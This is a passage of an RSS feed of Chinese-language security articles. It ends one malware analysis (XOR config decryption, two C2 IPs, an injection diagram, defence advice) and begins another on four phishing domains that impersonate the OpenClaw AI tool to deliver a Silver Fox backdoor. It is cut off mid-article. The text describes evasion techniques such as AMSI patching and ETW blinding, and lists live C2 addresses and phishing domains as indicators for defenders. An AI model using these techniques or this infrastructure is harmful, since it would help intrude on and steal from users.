leaf="">in</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">range</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">len</span></span><span leaf="">(data)):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        result[i] = data[i] ^ ((A * i + B) &amp; </span><span style="color: rgb(76, 129, 201);"><span leaf="">0xFF</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">bytes</span></span><span leaf="">(result)</span></p></code></pre></div><p data-line="257" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">解密完成后可以看到，该后门配置了双 C2 通道，分别为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">143.92.56.242</span></code><span leaf=""> 与 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">43.129.232.247</span></code><span leaf="">。<img class="rich_pages wxw-img" data-ratio="0.4287037037037037" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028186" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=cd237751&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVsYhFtiabFEU2axfm2ngtSK8Id6icv2CtDPgQb04tT9xviaDicNssPBqm7d1Os8xicN5QicO3cBYbzxibkYSTE9ffE0ClVlIO1r39NqM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:343px;"><thead><tr><th data-colwidth="318" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p style="text-align: left;"><span leaf="">C2 地址</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p style="text-align: left;"><span leaf="">角色</span></p></th></tr></thead><tbody><tr><td data-colwidth="318" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">143[.]92[.]56[.]242</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">主 C2</span></p></td></tr><tr><td data-colwidth="318" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">43[.]129[.]232[.]247</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">备用 C2</span></p></td></tr></tbody></table></p><p data-line="265" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">当被注入的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">UserAccountBroker.exe</span></code><span leaf=""> 不存在或意外退出时，注入 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">EDPNotify.exe</span></code><span leaf=""> 的守卫模块会自动检测，并重新拉起 C2 通信模块与配置，形成双重守护链。链路建立后，被控主机可能继续遭受信息窃取、凭据盗取、账号劫持以及针对性电信诈骗等后续攻击：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">   sihost.exe ──► 注入 ──► UserAccountBroker.exe  (C2 通信)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                                ▲</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                                │ 心跳探测 / 拉起</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                                │</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">   sihost.exe ──► 注入 ──► EDPNotify.exe          (守卫)</span></p></code></pre></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="277" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">九、完整攻击链全景</span></h2><figure data-line="278" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img class="rich_pages wxw-img" data-ratio="0.5583333333333333" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028189" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=61f6b914&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXcEX9z78HKic9ZicOOaDiaCHStib7X3jAqcu8GYzaHL848XPgUkXhkT2lonNHKRYkcjsGzrUzuAsy6iaRquqGjtpV5aFk5J33w6ylA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="282" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 0px;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">十、IOC</span></h2></div><div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><p style="text-align: center;margin-top: 0px;"><img class="rich_pages wxw-img" data-ratio="3.3759259259259258" data-s="300,640" data-type="jpeg" data-w="1080" style="width: 546px;height: auto !important;" type="block" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/jHUbrwW0VwXejsMsVib6YVlM1LibRoCI85NCn4uJicM6F3rltJmVpshnETpIz7tJfn2ge7FLg67U2uv84kXxCkhP8iambuZ5r8dQ71O5t0nc7WA/640?wx_fmt=jpeg&amp;from=appmsg" data-cropx2="1080" data-cropy2="3645.4945054945056" data-imgfileid="100028199" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=07e66c7b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwWv5UFibLbcWXECuTrdCguicia4YR0ChE7wB5xZ8GezXiaMtqYMrAWxuMBC9KREaToSj5hqOCGVHHmAQHlzjz2Qp0SlIcVsuicUS5EQ%2F640%3Fwx_fmt%3Djpeg"/></p><h2 data-line="315" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">十一、ATT&amp;CK 技术映射</span></h2><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="2.0890688259109313" data-s="300,640" data-type="jpeg" data-w="494" style="width: 546px;height: auto !important;" type="block" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/jHUbrwW0VwUKxtlzOYxX3Z94HCqLKOYmm0RrFWKia1Bf16b8c1mRZmycBXMF0zhmNb4z1QNdnNYdo0Z5Kthxg7icIB0rGb8ibPrYEFT92UyeTo/640?wx_fmt=png&amp;from=appmsg" data-cropx2="494.35164835164835" data-cropy1="4.56043956043956" data-cropy2="1036.131868131868" data-imgfileid="100028198" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=7f4a3c72&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwW6exDTmBlf0X5Ruw4qkXa6shmibqtYX27OfwSE5ZA8AXcZhicmoNMmeVvowcvcWboNkYefX5ucp2q9zkJlYianebNvZDnsXFNEoM%2F640%3Fwx_fmt%3Djpeg"/></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="334" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">十二、攻击者画像与防御建议</span></h2><h3 data-line="336" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">攻击者特征归纳</span></h3><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">工具链高度工程化，多个载荷采用统一的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.oi.ext.dll</span></code><span leaf=""> 命名规则，并复用 Obfuscator 与 ThreadPool IO 注入模板，具备明显的团伙化开发痕迹；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">偏好近白利用，攻击者放弃传统 DLL 劫持，转向对合法签名程序做二进制 PATCH + 消息回调劫持，静态层面更隐蔽；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">非 PE 载荷成为核心组织方式，核心业务代码被放入自定义扩展名的非 PE 文件中，规避大量基于 PE 结构的静态检测；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">对国内终端生态有明确针对性，样本硬编码 360、腾讯电脑管家、Defender 等安全产品进程名，并选用用户态微软签名进程驻留；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">防御绕过链完整，AMSI 双函数 PATCH、ETW 单字节致盲、关停安全软件三层配合，降低终端侧可见性。</span></p></li></ul><h3 data-line="344" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">对普通用户</span></h3><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">不要点击来源不明的 AI 工具下载链接，尤其是各种“翻译器、破解版、免费版”Hello GPT / ChatGPT 客户端；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">正规 AI 产品很少通过“百度竞价 / SEO 软文”引流下载；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">定期排查 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">%APPDATA%\Roaming\</span></code><span leaf=""> 目录下是否存在上表中列出的可疑 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">comain_*</span></code><span leaf=""> 子目录与非标扩展名文件。</span></p></li></ul><h3 data-line="350" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">对企业安全团队</span></h3><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">内核 ETW-Ti（Threat Intelligence）补位，用户态 ETW 已经可以被样本直接 PATCH，应启用内核态 ETW-Ti 或 EDR 自研内核回调作为采集底线；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">AMSI Provider 完整性监控，定期从磁盘重读 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">amsi.dll</span></code><span leaf=""> 并与内存 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.text</span></code><span leaf=""> 段比对，对 12 字节首部 PATCH 保持告警；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">ThreadPool IO 异常检测，关注 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CreateThreadpoolIo</span></code><span leaf=""> 的 callback 是否指向非合法模块的地址区间，尤其是 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0xXX0000</span></code><span leaf=""> 这类对齐地址，这是本家族的重要特征；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">敏感进程注入感知，针对 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">sihost.exe / UserAccountBroker.exe / EDPNotify.exe</span></code><span leaf=""> 等用户态 Shell 进程建立基线，监控异常模块加载与远程 Section 映射；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">计划任务审计，将指向 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">%APPDATA%\Roaming\</span></code><span leaf=""> 下 EXE 的计划任务纳入告警清单。</span></p></li></ul><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=db2c5fba&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511889%26idx%3D1%26sn%3Db471744f642d27bd782f8c4a105435be">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 07 May 2026 19:55:00 +0800</pubDate>
    </item>
    <item>
      <title>龙虾陷阱 | 伪装 OpenClaw 投递后门事件分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511618&amp;idx=1&amp;sn=4ec6bbad9b2ae648bc29ebc53d0cb2ed</link>
      <description>精心搭建的仿冒站点、暗藏杀机的 JPG 图片、一段永不落地磁盘的恶意代码——攻击者正在利用开源 AI 工具的热度，编织一张精密的猎杀网络。</description>
      <content:encoded><![CDATA[<p><span>腾讯安全威胁情报</span> <span>2026-04-07 14:53</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=e770417a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwVsHwSzpGXSYyRLohWhCttDAjLR9fria0qurl6zgdR3xrE4kCeKaP1pIYdt9h8EGLeqWROcd9M5TAT7amHlgge7TiaW3h6kInsPs%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>精心搭建的仿冒站点、暗藏杀机的 JPG 图片、一段永不落地磁盘的恶意代码——攻击者正在利用开源 AI 工具的热度，编织一张精密的猎杀网络。</p>
  <div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><h2 data-line="0" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 0px auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">事件背景</span></h2><p data-line="2" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">2026 年 3 月 ，腾讯安全科恩实验室威胁情报团队在日常威胁狩猎中捕获到一组可疑域名。它们无一例外地指向同一个目标——</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">OpenClaw</span></strong><span leaf="">，一款近期热度飙升的开源 AI 智能体执行网关。</span></p><p data-line="4" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">OpenClaw 凭借本地部署、安装即用的理念迅速积累了大量开发者用户。而攻击者显然也注意到了这一点。</span></p><p data-line="6" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">当我们打开这些域名时，映入眼帘的是与 OpenClaw 官网几乎一模一样的页面。精致的 UI、熟悉的龙虾 Logo、诱人的功能介绍——一切看起来都那么正常。但藏在&#34;安装下载&#34;按钮背后的，是一个携带恶意后门的安装包。经研判，该后门为 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">银狐</span></strong><span leaf=""> 家族的某个分支变种。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="10" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">第一阶段：精心布局的仿冒站群</span></h2><p data-line="12" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者并非只搭建了一个钓鱼页面，而是同时注册了 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">4 个</span></strong><span leaf=""> 仿冒域名，每个站点采用不同的 UI 风格，仿佛在进行 A/B 测试——哪种皮肤更容易让受害者上钩。</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:320px;"><thead><tr><th data-colwidth="89" align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">#</span></p></th><th data-colwidth="206" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">钓鱼域名</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">风格特征</span></p></th></tr></thead><tbody><tr><td data-colwidth="89" align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">1</span></p></td><td data-colwidth="206" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">cc-openclaw.com.cn</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">深色主题，仿官网主站</span></p></td></tr><tr><td data-colwidth="89" align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">2</span></p></td><td data-colwidth="206" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">zh-openclaw.com.cn</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">深色主题，&#34;快速开始&#34;引导页</span></p></td></tr><tr><td data-colwidth="89" align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">3</span></p></td><td data-colwidth="206" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">wap-openclaw.com.cn</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">紫色主题，强调&#34;MIT 开源免费&#34;</span></p></td></tr><tr><td data-colwidth="89" align="center" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: center;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">4</span></p></td><td data-colwidth="206" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">openclaw-cc.com.cn</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">浅色红色主题，伪造用户评价</span></p></td></tr></tbody></table></p><p data-line="21" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">值得注意的是，4 个域名全部使用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.com.cn</span></code><span leaf=""> 后缀——这是国内钓鱼攻击中常见的手法，利用用户对 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.cn</span></code><span leaf=""> 域名的天然信任感。</span></p><h3 data-line="23" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">逐一拆解</span></h3><p data-line="25" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">站点 